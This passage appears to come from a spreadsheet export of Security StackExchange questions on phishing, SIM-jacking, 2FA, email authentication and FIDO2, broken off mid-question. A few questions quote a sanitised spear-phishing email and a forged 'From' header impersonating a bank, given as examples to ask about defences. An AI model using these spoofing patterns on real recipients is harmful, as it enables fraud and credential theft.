 &lt;p&gt;I realize that (by the pigeonhole principle) every sufficiently large enterprise with a forced password change policy will have a lot of same-day password changes.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;password-management&gt;&lt;password-cracking&gt;&lt;password-policy&gt;&lt;active-directory&gt;</t>
  </si>
  <si>
    <t>Is hacking email with simjacking a concern if you don't have 2FA for the email?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been doing some reading on simjacking lately, mainly around how one may be compromised. One common tidbit I read is that you can access your email &lt;em&gt;and&lt;/em&gt; your other financial services if you have 2FA for those services. E.g.: here is one quote:&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;Once the swap is complete, messages containing codes for those two-factor authentication systems we now all have can be intercepted, and fraudsters can hop into your email, social media or mobile banking accounts.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;(Source: &lt;a href="https://www.vice.com/en/article/3kx4ej/sim-jacking-mobile-phone-fraud" rel="nofollow noreferrer"&gt;https://www.vice.com/en/article/3kx4ej/sim-jacking-mobile-phone-fraud&lt;/a&gt;)&lt;/p&gt;
 &lt;p&gt;I completely understand &lt;em&gt;social media&lt;/em&gt; and &lt;em&gt;mobile banking accounts&lt;/em&gt; could be compromised: if my mobile banking and/or social media accounts are set up to send the security code to my mobile device, and you simjack that device, then the fraudster can receive the code and log into your accounts.&lt;/p&gt;
 &lt;p&gt;However, assuming your email &lt;em&gt;does not&lt;/em&gt; use your mobile number as recipient for 2FA (e.g. if you use TOTP, or if you have a back-up email address to send codes to), does simjacking actually give access to email? I can't seem to connect those two dots -- and I am not sure if I am missing something.&lt;/p&gt;
 &lt;p&gt;Thank you.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;simcard&gt;</t>
  </si>
  <si>
    <t>Why is a link in an email more dangerous than a link from a web search?</t>
  </si>
  <si>
    <t>&lt;p&gt;Everyone knows of the common cybersecurity tips to be careful when you open links in an email. But every day we look for something on the Internet, clicking links which the search engine shows us, and we do not have the same fear. Why are the links in email considered more dangerous than links from web search results?&lt;/p&gt;
 &lt;p&gt;Maybe it is related to the fact that links in an email may contain a more personal attack malicious to you or your company?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Which topics should a security training for non-IT persons contain?</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;em&gt;(I am not sure, if this question fits the security.stackexchange-board, but the &lt;a href="https://security.stackexchange.com/help/on-topic"&gt;list of askable topics&lt;/a&gt; does not exclude this question imho and there are some &lt;a href="https://security.stackexchange.com/questions/12770/security-training-for-corporate-facebook-users"&gt;examples&lt;/a&gt;)&lt;/em&gt;&lt;/p&gt;
 &lt;p&gt;I've worked for several different companies of which some had outsourced their IT-department. This means that the people at the company mostly use technology, but have no deeper understand of it, especially when it comes to security.&lt;/p&gt;
 &lt;p&gt;Therefore I was toying with the idea to offer 1 or 2 small workshops / trainings, so they can get at least an idea of WHY computer security is important and WHAT exactly is important. I would like to do this because I think, human knowledge should be shared, no matter the recipient and both sides might learn. My colleagues might understand security better and I might understand their point of view better.&lt;/p&gt;
 &lt;p&gt;So I sat down and tried to come up with a list of necessary and useful topics, keeping the target audience in mind. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Am I missing topics, should there be other topics? What is necessary to learn, when you deal with computer security?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Topics:&lt;/strong&gt;&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Why computer security? (Costs, Ransomware stopping a complete company, ...)&lt;/li&gt;
 &lt;li&gt;Passwords (What is a good password, how to store, never use same PW on different accounts, ...)&lt;/li&gt;
 &lt;li&gt;Lock the screen when leaving the workplace (Because...? Did not find good examples of what could happen, also is this a high priority?)&lt;/li&gt;
 &lt;li&gt;Should I show a hacking example to visualize what it is? For example older phones / tablets are crackable pretty fast with open source software.&lt;/li&gt;
 &lt;li&gt;Social Engineering (2 colleagues got a call and became victims to the &lt;a href="http://www.welivesecurity.com/2011/07/19/support-desk-scams-clsid-not-unique/" rel="nofollow noreferrer"&gt;CLSID-Scam&lt;/a&gt;, door gliding, USB sticks in the parking lot, ...)&lt;/li&gt;
 &lt;li&gt;Internetsecurity (NoScript, deactivate Flash / JS, what's phishing, ...)&lt;/li&gt;
 &lt;li&gt;Backups&lt;/li&gt;
 &lt;li&gt;Email encryption&lt;/li&gt;
 &lt;li&gt;Protective measures (keep OS updated, use antivirus-software, dont use the admin-account as a default, ...)&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I dont know which topics should be mandatory and in which order. The training might take 1 or even 2 hours. I would also create some cheat-sheets, so they can take away some written information, further reading etc.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;professional-education&gt;&lt;awareness&gt;</t>
  </si>
  <si>
    <t>Protecting against spoofed email in alias/phrase field</t>
  </si>
  <si>
    <t>&lt;p&gt;We have fully configured SPF, DKIM and DMARC policies (100% reject) for our email domain (e.g. spoofed.com), which is managed by gmail, but we have recently started seeing spear phishing emails with the following format (our email addresses/names have been sanitised):&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;From: Bob Smith Bob@spoofed.com &amp;lt;admin@inter-corp.net&amp;gt;
 Date: Wed, Aug 26, 2020 at 10:02 AM
 Subject: External legal counsel.
 To: &amp;lt;tim@spoofed.com&amp;gt;
 tim,
 I am contacting you regarding a sensitive operation that I have approved and for which I need you to manage it, has Adv.Thomas Legler informed you about this case?
 Best Regards,
 Bob Smith
 Sent from my iPhone
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;The email &lt;em&gt;From:&lt;/em&gt; header is:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;From: &amp;quot;Bob Smith Bob@spoofed.com&amp;quot; &amp;lt;admin@inter-corp.net&amp;gt;
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;So we can see that the &lt;em&gt;Bob@spoofed.com&lt;/em&gt; &amp;quot;faked&amp;quot; email address that the phisher is trying to imitate is part of the email alias/phrase field. Such From headers might incorrectly lead recipients to believe the email has genuinely come from &lt;em&gt;Bob@spoofed.com&lt;/em&gt; when in fact it's from &lt;em&gt;admin@inter-corp.net&lt;/em&gt;.&lt;/p&gt;
 &lt;p&gt;Are there any further best practice protections we can put in place to avoid spoofed email addresses being included in the email alias in this way?&lt;/p&gt;
 &lt;p&gt;If any further headers are required please let me know.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How are hardware keys phishing resistant to man-in-the-middle attacks?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've heard that hardware keys like Yubikey are phishing resistant. But I do not understand where a phished man-in-the-middle attack, which tries to &amp;quot;forward&amp;quot; the whole communication, fails in that scenario.&lt;/p&gt;
 &lt;p&gt;I'm imagining the attacker opens a live connection to the target site and forwards every little bit of information to the victim while displaying a fake website. That fake website would somehow need to certify to the victim's browser as the real one by forwarding that communication, too. Eventually the victim is asked to press his hardware key button and the attacker forwards every communication again.&lt;/p&gt;
 &lt;p&gt;So if you are a skilled hacker who has full control over the internet communication, at which step is the hacker unable to play a transparent man-in-the-middle?&lt;/p&gt;
 &lt;p&gt;I could imagine the answer is that either the communication must be encrypted up to the victim and the hacker cannot decrypt, or the hacker sets up an unencrypted end, but is unable to re-encrypt it while the user's browser is asking for encryption. But not sure how to make sense of it.&lt;/p&gt;
 &lt;p&gt;(What are the names of phishing resistant methods of hardware keys? Webauthn, challenge-response, ...?)&lt;/p&gt;
 &lt;p&gt;I do refer to the U2F mode only and I suggest that the attacker tries to certify as the real domain by &amp;quot;forwarding communication&amp;quot; - if that is possible.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;yubikey&gt;&lt;hardware-token&gt;</t>
  </si>
  <si>
    <t>Is Adblock (Plus) a security risk?</t>
  </si>
  <si>
    <t>&lt;p&gt;My email-provider's website (&lt;code&gt;http://www.gmx.de&lt;/code&gt;) recently started linking to the (German) site &lt;code&gt;http://www.browsersicherheit.info/&lt;/code&gt; which basically claims that due to its capabilities to modify a site's appearance, Adblock Plus (and others) might actually be abused for phising. Here's a quote from that site plus its translation:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Solche Add-ons haben Zugriff auf alle Ihre Eingaben im Browser und k√∂nnen diese auch an Dritte weitergeben ‚Äì auch Ihr Bank-Passwort. Dies kann auf allen Web-Seiten passieren. Sicherheitsmechanismen wie SSL k√∂nnen das nicht verhindern.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;translated:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Such addons can access all your browser's input and can also forward them to third parties - even your banking password. This can happen on all websites. Security mechanisms such as SSL cannot avoid that.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Ok, they mention other (pretty obviously crapware) addons, but is Adblock Plus really a security threat or do that site's operators simply use the opportunity to try and scare inexperienced users into viewing their ads again?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;web-browser&gt;&lt;phishing&gt;&lt;browser-extensions&gt;&lt;threats&gt;</t>
  </si>
  <si>
    <t>If You Use Secure Sites with Extended Validation Certificates How Much Do You Still Have To Worry About Phishing Sites Impersonating Them?</t>
  </si>
  <si>
    <t>&lt;p&gt;Was mulling over the issue of protecting users from password-stealing phishing sites when an interesting question that hadn't occurred to me before popped into my head:&lt;/p&gt;
 &lt;p&gt;Let's say that I decide to take Chromium, Firefox, or another open-source browser and make a slight modification to its capabilities: I alter it so that it will &lt;em&gt;only&lt;/em&gt; load sites that bear valid &lt;a href="https://security.stackexchange.com/questions/15865/what-are-the-advantages-of-ev-certificate"&gt;Extended Validation certificates&lt;/a&gt;, to verify that the page/site is really from the organization/entity it purports to be from. This special EV-sites-only browser would definitely &lt;strong&gt;not&lt;/strong&gt; be intended for use for most "normal", day-to-day browsing, but instead only to visit &amp;amp; login to very sensitive sites that one really, really wants to protect against phishing/impersonation-based credential theft. (Banking &amp;amp; other financial, email, etc.) &lt;/p&gt;
 &lt;p&gt;Second, let's say that I then create a usage policy (for users in an organization I work for, or even just for myself) that says that those sensitive sites can &lt;em&gt;only&lt;/em&gt; be accessed in my special EV-only browser. Maybe I even make my EV-sites-only browser the default one that loads any links a user might unthinkingly click in email &amp;amp; messaging apps, just to provide the most comprehensive protection against fake-login phishing tactics I can.&lt;/p&gt;
 &lt;p&gt;So, from a practical standpoint*, would a user be effectively safe from site-impersonation phishing if he/she only visited sensitive sites in my EV-only browser? &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Or, put another way, if a user ensures that he/she uses only sensitive sites that have Extended Validation certificates is he/she safe from phishing attacks that use impostor sites to steal the user's credentials?&lt;/strong&gt; &lt;/p&gt;
 &lt;p&gt;*Note my use of the phrase "from a practical standpoint". Obviously, from a theoretical standpoint a Bad Guy might be able to get a cert authority to issue an EV certificate to him that could be used for an impostor site. But is that something that actually occurs in the wild today?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;certificates&gt;&lt;phishing&gt;&lt;credentials&gt;</t>
  </si>
  <si>
    <t>Using Gmail in China triggered lots of Two Factor SMS</t>
  </si>
  <si>
    <t>&lt;p&gt;A friend of mine lives in Hong Kong and she travelled to China over the weekend. Whilst there, she was able to use Gmail on her Android phone without logging in again, but she had to re-login on her laptop to use her account (she didn't end up using it on her laptop). Something very strange happened while she was there: she received 14 text messages on her mobile phone with the same 6 digit Two Factor login code. She had never requested it herself.&lt;/p&gt;
 &lt;p&gt;What's going on here? Are the apps on her laptop automatically requesting this Two Factor code to be sent? Is this some sort of phishing attempt? Was someone (government?) trying to get into her account? If someone was trying to get in, I think it means they already know her password or else they would not be able to trigger those texts. She's definitely not a person of interest to the govt!&lt;/p&gt;
 &lt;p&gt;Am interested to hear thoughts on 1) What was happening? 2) What (if any) measures need to be taken now?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;attacks&gt;&lt;multi-factor&gt;&lt;google&gt;</t>
  </si>
  <si>
    <t>What are the security flaws in web based TOTP app?</t>
  </si>
  <si>
    <t>&lt;p&gt;If there is a widely accessible TOTP website (prototype: &lt;a href="https://depperm.github.io/" rel="nofollow noreferrer"&gt;https://depperm.github.io/&lt;/a&gt;) that allows users to set a date and secret they can remember or a package that allows companies/developers to create their own domain/site specific tool, what possible security flaws are there beyond having information phished, key logged, or copied in person?&lt;/p&gt;
 &lt;p&gt;The date and secret would be stored encrypted on the database (and set in the same manner as a password), so when the OTP comes in a new token can be generated from the decrypted info and validated against the incoming one.&lt;/p&gt;
 &lt;p&gt;&lt;em&gt;I am aware of the potential issue of client time being different than server time, but I believe there a viable solutions for this problem and I don't see it as a security flaw but a usability flaw&lt;/em&gt;&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;one-time-password&gt;&lt;totp&gt;</t>
  </si>
  <si>
    <t>What is this user trying to do?</t>
  </si>
  <si>
    <t>&lt;p&gt;I work with a company that creates marketing software, we recently created a forum so we could talk with users who need support.&lt;/p&gt;
 &lt;p&gt;I'm the main admin on this forum and a user, let's call them &lt;code&gt;person1&lt;/code&gt; has been trying to run PHP code in the comments. I originally thought maybe he was referring to the question with it, but then their comments all started getting marked as spam and needed review. After a handful of comments, I decided to IP Ban them.&lt;/p&gt;
 &lt;p&gt;Fast forward a month or so, and now someone has been filling out all the forms on our site, in the name slot they used the same username &lt;code&gt;person1&lt;/code&gt;, but now they are trying to append html code into the inputs. Each form submission gets sent to email and it showed that he was able to execute an image tag and an a tag in the field. The images weren't malicious or anything, just cat pics, but the links were things like &lt;code&gt;http://www.phishing-site.com&lt;/code&gt; and &lt;code&gt;http://www.evil.com&lt;/code&gt;. And they also tried running a few SQL statements in the hopes of Dropping our DB.&lt;/p&gt;
 &lt;p&gt;I ended up looking up their username online and there are multiple accounts by the same name sitting in queue for bug bounties from companies like Paypal, Apple and Windows. Is it possible that they are just running a script to search for bugs in our system, or are they trying to do something more malicious? What could be a possible solution for this?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;user-tracking&gt;&lt;information-gathering&gt;&lt;bug-bounty&gt;</t>
  </si>
  <si>
    <t>Is this google security alert legit?</t>
  </si>
  <si>
    <t>&lt;p&gt;I got this security alert from Google lately, but I'm not sure if it is legit. Someone might have tried to scam me, because it says my E-Mail was linked to another as the recovery email. Either coincidence or someone wanted to harm me. I'm not even sure, whether this email is real, because it was sent from identity-reachout.bounces.google.com, which doesn't really sound like it's a legit email, but has been signed accounts.google.com. I have logged into my Google account and removed any of my older logins, because of previous attempts of getting my custom ROM to work properly. Not only that, but I have checked for unauthorized logins and more, but I'm still very suspicious of that email. Any advice? Is this actually a legit email from Google and is my account affected? If it's real: what should I make sure, to not get my account permanently deleted?&lt;/p&gt;
 &lt;p&gt;I have this screenshot of the email's body ‚Ä¶&lt;br/&gt;
 &lt;a href="https://i.stack.imgur.com/xtUrq.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/xtUrq.png" alt="Email content" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;‚Ä¶ and this screenshot of the email information.&lt;br/&gt;
 &lt;a href="https://i.stack.imgur.com/Obt0F.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/Obt0F.png" alt="Sender information" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Generally, my account's language is set to German, while the stated linked email's might be set to English.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;account-security&gt;&lt;google&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>What's the use of DKIM/SPF if it only validates the Enveloppe From?</t>
  </si>
  <si>
    <t>&lt;p&gt;DKIM and SPF are mentioned as &lt;a href="https://blog.cipher.com/phishing-protection-spf-dkim-dmarc" rel="nofollow noreferrer"&gt;powerful mitigations for having your domain abused for phishing&lt;/a&gt;. But when I send a mail like this:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Return-Path: &amp;lt;me@mydomain.example.com&amp;gt;
 From: Citibank security team &amp;lt;security@citi.com&amp;gt;
 Reply-To: Noreply &amp;lt;noreply@citi.com&amp;gt;
 Subject: Unauthorized attempt on your account
 &lt;/code&gt;&lt;/pre&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;With Enveloppe From &lt;code&gt;&amp;lt;me@mydomain.example.com&amp;gt;&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;&lt;p&gt;With a valid DKIM signature for &lt;code&gt;mydomain.example.com&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
 &lt;li&gt;Sent from a host that is authorized to send according to the SPF policy for &lt;code&gt;mydomain.example.com&lt;/code&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;It is my understanding that the mail will be shown as if it actually was sent from Citibank. The mailserver logs may show something about an unaligned DKIM-signature, and a DMARC-report may be sent to Citibank eventually, but it doesn't at all prevent a scam-mail from being delivered.&lt;/p&gt;
 &lt;p&gt;Why does the specification check the From: address so loosely, while that is the only identifier a user would see directly in their mail client?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;dkim&gt;</t>
  </si>
  <si>
    <t>Can people let me know why this command was ran and why he typed "network hacked....clampi found</t>
  </si>
  <si>
    <t>&lt;p&gt;What is the reason this command was run and why &lt;code&gt;network hacked....clampi found&lt;/code&gt; was typed in at the command prompt&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/TbqAg.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/TbqAg.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Title has been changed....somebody gave me the computer to fix after calling a number via a popup that was difficult to get rid off....and also used a phishing technique to get her to call a number so to speak to a microsoft engineer...he logged on and messed around and said 500 euro...&lt;/p&gt;
 &lt;p&gt;i'm not sure if he typed the "what the title of this question is" there for? to scare the user using a technical term?? or did the person make a mistake and write something in there that was meant to go into his notes?&lt;/p&gt;
 &lt;p&gt;had to refresh the machine, didn't have a chance to look into it too much, but it had me investigating wannacry which clampi is related....but was it just a pop up that caused the problem? or did he want to say it would cost the 500 euro to get rid of clampi...perhaps the attacker thought that this person would have heardd of the term....basically all i wanna know is if that was only meant for his notes? from the technical pov he wouldn't be using the term network hacked.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;scam&gt;</t>
  </si>
  <si>
    <t>Apparently PayPal-affiliated site with very suspect security</t>
  </si>
  <si>
    <t>&lt;h3&gt;History&lt;/h3&gt;
 &lt;ul&gt;
 &lt;li&gt;I got an email this afternoon to my gmail from &amp;quot;paypal@e.paypal.com&amp;quot; with &lt;code&gt;mailed-by: na.e.paypal.com&lt;/code&gt; and &lt;code&gt;signed-by: e.paypal.com&lt;/code&gt;. Gmail did not report it as spam/phishing/suspicious and it went straight to my inbox, so the MX records must check out.&lt;/li&gt;
 &lt;li&gt;The email effectively linked to &lt;a href="https://www.paypal-special.com/landing" rel="noreferrer"&gt;this url&lt;/a&gt;.&lt;/li&gt;
 &lt;li&gt;The URL, when clicked, presents an HTTPS encrypted website bearing PayPal Inc's Class 3 EV certificate from Verisign, which is &lt;strong&gt;not&lt;/strong&gt; easy to obtain.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;By all accounts, it &lt;em&gt;appears&lt;/em&gt; that the site is a legitimate PayPal property.&lt;/p&gt;
 &lt;p&gt;But then things start getting extremely suspect:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;img src="https://i.stack.imgur.com/s8zv5.png" alt="enter image description here" /&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;If you click &amp;quot;Continue&amp;quot; on that page, &lt;strong&gt;with or without entering any text in the email address field&lt;/strong&gt;, it works -- it takes you to the &amp;quot;logged-in&amp;quot; site. Indeed, the &amp;quot;Log in&amp;quot; button at the top of the page turns to a &amp;quot;Log out&amp;quot; button. It's basically a smokescreen.&lt;/p&gt;
 &lt;p&gt;Then, immediately, you are greeted with a pane that displays cross-domain advertisements from other domains to try and get you to buy stuff. What in the world is the point of this website other than to display (possibly malicious / suspicious) third-party ads to get PayPal more money?&lt;/p&gt;
 &lt;p&gt;This makes absolutely no sense, and it really shakes my trust in PayPal as a company if they're willing to put their Class 3 EV cert on a site with this level of stupid. Also, the &amp;quot;AVAILABLE BY INVITATION ONLY&amp;quot; is &lt;em&gt;completely&lt;/em&gt; a lie; you can go there on &lt;em&gt;any&lt;/em&gt; computer in the entire world and click &amp;quot;Continue&amp;quot;, and you're &amp;quot;in&amp;quot;, for all that it's worth (which is, basically, nothing).&lt;/p&gt;
 &lt;p&gt;My concern is more that they implemented a website with such nonsense security; only sent out &amp;quot;invites&amp;quot; to certain users; and then had the gall to put their EV cert on it as if they &lt;em&gt;endorse&lt;/em&gt; this hogwash. Why would a site go through the trouble of having an email &amp;quot;login&amp;quot; screen when what they want to do is to just display advertisements to anyone who's foolish enough to visit the site at all?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;trust&gt;</t>
  </si>
  <si>
    <t>How does the MITM (Man in the middle) attack happen with respect to SQRL</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently looked into &lt;a href="https://www.grc.com/sqrl/sqrl.htm" rel="nofollow noreferrer"&gt;SQRL&lt;/a&gt; and was intrigued by its simplicity. &lt;/p&gt;
 &lt;p&gt;At first glance it seemed reliable and its author claimed it was inherently fail-proof against &lt;a href="https://www.grc.com/sqrl/phishing.htm" rel="nofollow noreferrer"&gt;phishing and MITM attacks&lt;/a&gt;.&lt;/p&gt;
 &lt;p&gt;But upon further reading &lt;a href="https://security.stackexchange.com/questions/43374/could-sqrl-really-be-as-secure-as-they-say"&gt;at this stack exchange discussion&lt;/a&gt; I saw a comment (the 2nd reply by tylerl) that claimed it was highly susceptible to MITM.&lt;/p&gt;
 &lt;p&gt;Both line of arguments appear similar except one concludes that it is safe and the other not. As per the author authentication is happening with the correct server. So I can't to understand how MITM is possible.&lt;/p&gt;
 &lt;p&gt;Also the stack exchange reply claimed client side authenticators like LastPass prevent phishing. Wouldn't it be just as simple to have similar client side authentication in the SQRL?&lt;/p&gt;
 &lt;p&gt;A little clear up would be very helpful.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;encryption&gt;&lt;tls&gt;&lt;authentication&gt;&lt;man-in-the-middle&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>What is this site?</t>
  </si>
  <si>
    <t>&lt;p&gt;I was reading an &lt;a href="http://www.theregister.co.uk/2014/05/05/chrome_origin_chip_ui_controversy/" rel="nofollow"&gt;article&lt;/a&gt; which included an anecdote of someone who had nearly fallen for a phishing attack which:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;established a mock Halifax.co.uk website which replaced forward slashes in the legitimate URL with full stops.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;By chance I wondered if there was anything at the url &lt;code&gt;http://h.alifax.co.uk&lt;/code&gt; was taken and if so if it was a phishing page. However, it turns out to be a page which randomly redirects you to other seemingly random websites (I got redirected to a site comparing &lt;a href="http://www.mysupermarket.co.uk/tesco-price-comparison/Nappies/Tesco_Everyday_Value_Size_4_Maxi_7_18kg_20.html?banner=56360&amp;amp;utm_medium=email&amp;amp;utm_source=MediaBuy_UK&amp;amp;utm_campaign=ADNInternal&amp;amp;utm_content=Product&amp;amp;utm_term=11164808-101221543" rel="nofollow"&gt;diaper prices&lt;/a&gt;, and a travel site!).&lt;/p&gt;
 &lt;p&gt;What is this? Is there anything sinister going on at all here?&lt;/p&gt;</t>
  </si>
  <si>
    <t>I have one Friend that said he is getting texts from me but its not me</t>
  </si>
  <si>
    <t>&lt;p&gt;A friend of mine is getting a text asking him to click on a link to view a video. The name is my first and last name. Most people do not spell their first name as mine but there is no phone number and the email address shows up under &amp;quot;other&amp;quot;. I googled the email address and the email address belongs to a teacher in Texas. I only have one friend that notified me of this. So who is hacked? Him, Me or the Teacher?&lt;/p&gt;</t>
  </si>
  <si>
    <t>How a professional hacker would penetrate a computer in a network?</t>
  </si>
  <si>
    <t>&lt;p&gt;Which kinds of vulnerabilities or security holes a hacker would use to penetrate and take over a computer in a network, like a normal PC in a default network (Wireless-LAN).&lt;/p&gt;
 &lt;p&gt;I often hear that the computer of a person got hacked, but it was not a webserver, so the attacker could not exploit a SQL-Injection or a LFI vulnerability or something like that. Is the only option or possibility to hack a computer of a person (not a webserver) with Phishing or Social Engineering (Tronjans, Backdoors end etc.) via email attachments or something like that?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;network&gt;&lt;penetration-test&gt;&lt;exploit&gt;&lt;phishing&gt;&lt;social-engineering&gt;</t>
  </si>
  <si>
    <t>Can someone steal cookie contents via a phishing attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;If someone successfully set up a phishing website on a fake wireless network for say, bankofamerica.com, and lets pretend that SSL was not used, would they be able to run a script on the server that reads the cookie contents of anyone who connected to it (for example, a long-term authentication token)?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;cookies&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>Can a 0800 and 00800 be from different companies in UK</t>
  </si>
  <si>
    <t>&lt;p&gt;I recently received a call from a 00800 number, that seemed like a prerecorded message asking me to press some keys to continue. I disconnected. &lt;/p&gt;
 &lt;p&gt;I later googled the number and I noticed that a company in UK (Thames Water) uses the same number but with 0800. When calling the 0800 version I could hear different 'automatic secretary'. &lt;/p&gt;
 &lt;p&gt;Is it possible that 00800 is controlled by a different company than the 0800 number? If so, then this is a dangerous scamming technique.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;phishing&gt;&lt;phone&gt;</t>
  </si>
  <si>
    <t>Protecting the user from unauthorized access</t>
  </si>
  <si>
    <t>&lt;p&gt;So we are planning on adding a feature to our app that is similar to what Google does, but a little stricter:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;You have a list of sessions that are tied to a user agent and IP address(?) (google shows a location)&lt;/li&gt;
 &lt;li&gt;2FA is only needed when you try to login from a device that hasn‚Äôt been approved for the last 30 days.&lt;/li&gt;
 &lt;li&gt;If a login attempt is made from a new user-agent/IP pairing, we would like to send a link with a token to their email address to approve the login.&lt;/li&gt;
 &lt;li&gt;When they click the link, if 2FA is active, we will ask for 2FA to approve the login.&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;A few things we are wondering about:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;By making the user take action to approve logins, rather than Google where it just tells you of the login... we hope to prevent a higher number of unauthorized logins. (Currently we send a mail every time the user logs in and we tell them the user-agent and region.)&lt;/li&gt;
 &lt;li&gt;By requiring 2FA to utilize the link, we hope to further protect unauthorized login (while you can password reset with email access, we require 2FA auth before you can get to the page for entering the new password after clicking the reset link.)&lt;/li&gt;
 &lt;li&gt;Our biggest concern is that we aren‚Äôt going to accidentally make some mistake and some user will have to jump through this hoop a billion times in the same session because their mobile carrier is switching their IP constantly... etc etc&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;So I am getting an idea that IP based restriction is probably not too good... so maybe look up the region via IP and just whitelist the region? But then a hacker could just easily spoof user-agent and use a proxy.&lt;/p&gt;
 &lt;p&gt;Note: I understand this is not our stop-all for security, but we would like to add this layer to help lower the instances of unauthorized access.&lt;/p&gt;
 &lt;p&gt;My question: What overall model for session/login restriction will strike a good balance between ‚Äúpreventing newb hackers / jerks from logging in as you when they guessed your password / phished it‚Äù and ‚Äúnot annoying the user all the time with mail auth links‚Äù?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;web-application&gt;&lt;session-management&gt;</t>
  </si>
  <si>
    <t>Receiving validation mails with wrong address</t>
  </si>
  <si>
    <t>&lt;p&gt;Lately I have been receiving unexpected validation/confirmation mails from various social media and/or e-commerce sites, asking me to validate my account or giving me the overview of my last order. I never registered to those social media, nor I ordered items on that site.&lt;/p&gt;
 &lt;p&gt;I checked all the usual suspects for a scam mail (hyperlink previews seem legit, grammar and syntax is ok, etc.), the only thing these mails have in common is that at the very end they have the disclaimer&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;This mail has been sent to namesurname@gmail.com [...]&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;while my address is name.surname@gmail.com&lt;/p&gt;
 &lt;p&gt;Are these real phishing mails, or is it a problem with how Gmail addresses the mails?&lt;/p&gt;</t>
  </si>
  <si>
    <t>Why do phishing e-mails use faked e-mail addresses instead of the real one?</t>
  </si>
  <si>
    <t>&lt;p&gt;I read that you can write anything into the &lt;code&gt;From:&lt;/code&gt; field of an e-mail. &lt;/p&gt;
 &lt;p&gt;If that is true, then why are phishing e-mails trying to trick me with look-a-like addresses like &lt;code&gt;service@amaz0n.com&lt;/code&gt; instead of just using the actual &lt;code&gt;service@amazon.com&lt;/code&gt; itself?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;email-spoofing&gt;&lt;spf&gt;</t>
  </si>
  <si>
    <t>Is FIDO2 authentication vulnerable to a social engineering replay attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm starting to learn about the FIDO2 standard, and I'm wondering if this scenario is possible...&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Victim visits a credential harvesting page and enters their credentials&lt;/li&gt;
 &lt;li&gt;Credential harvesting backend opens a connection to the legitimate login page and submits the stolen credentials&lt;/li&gt;
 &lt;li&gt;Legitimate website presents a FIDO2 challenge&lt;/li&gt;
